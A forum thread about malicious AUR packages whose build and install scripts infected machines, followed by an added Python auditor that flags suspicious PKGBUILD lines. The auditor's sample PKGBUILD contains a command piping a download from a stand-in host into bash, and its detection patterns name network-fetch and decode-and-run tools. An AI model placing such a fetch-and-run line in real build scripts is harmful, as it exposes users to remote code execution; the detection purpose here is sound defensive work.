Active AUR malicious packages incident (archlinux.org)
Posted by Nemeski@mander.xyz to Linux@programming.dev · 17 days ago

Default Username@lemmy.dbzer0.com · 17 days ago
This attack was executed by a script running in the PKGBUILD itself. You didn’t have to run the application to be infected since just building it will infect your machine.

9tr6gyp3@lemmy.world · 17 days ago
Yeah, I bet the build process could also be sandboxed, but I’m sure it’s not the default.

Default Username@lemmy.dbzer0.com · 17 days ago
Sandboxing the build process would be a process. Nix already does it, for example. Many AUR packages don’t include a full list of dependencies.

patlefort@lemmy.world · 17 days ago
It also had an install script that will be run as root when the package is installed. Can’t sandbox that.
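
The two points raised in the thread (code in the PKGBUILD runs at build time, and the `install=` scriptlet runs as root at install time) can be checked before building. The following is an added example, not part of the thread or of any Arch tooling: it reads a PKGBUILD as plain text without sourcing it, reports the install hook, and flags lines matching a few heuristic patterns. The sample PKGBUILD, the pattern list and the function name `audit_pkgbuild` are assumptions made for illustration.

```python
import re

# Constructed sample PKGBUILD for illustration; not taken from any real package.
SAMPLE_PKGBUILD = '''\
pkgname=example-bin
pkgver=1.0
source=("https://example.invalid/example-1.0.tar.gz")
install=example.install
prepare() {
  curl -s https://example.invalid/setup.sh | bash
}
package() {
  install -Dm755 example "$pkgdir/usr/bin/example"
}
'''

# Heuristic patterns (assumptions of this example): commands that fetch or
# decode-and-run code during the build, outside the declared source= array.
SUSPICIOUS = {
    "network fetch": re.compile(r"\b(curl|wget)\b"),
    "pipe to interpreter": re.compile(r"\|\s*(ba|z)?sh\b|\|\s*python[0-9.]*\b"),
    "dynamic eval": re.compile(r"\beval\b|\bbase64\s+(-d|--decode)\b"),
}

def audit_pkgbuild(text):
    """Read a PKGBUILD as plain text (never source it) and return findings."""
    findings = {"install_hook": None, "flags": []}
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith("#"):
            continue
        m = re.match(r"install=['\"]?([^'\"\s]+)", stripped)
        if m:
            # The .install scriptlet runs as root at install time: review it too.
            findings["install_hook"] = m.group(1)
        for label, pattern in SUSPICIOUS.items():
            if pattern.search(stripped):
                findings["flags"].append((lineno, label, stripped))
    return findings

if __name__ == "__main__":
    result = audit_pkgbuild(SAMPLE_PKGBUILD)
    print("install hook:", result["install_hook"])
    for lineno, label, code in result["flags"]:
        print(f"line {lineno}: {label}: {code}")
```

A clean result only means none of these patterns matched; the PKGBUILD and the named `.install` file still need to be read before running makepkg.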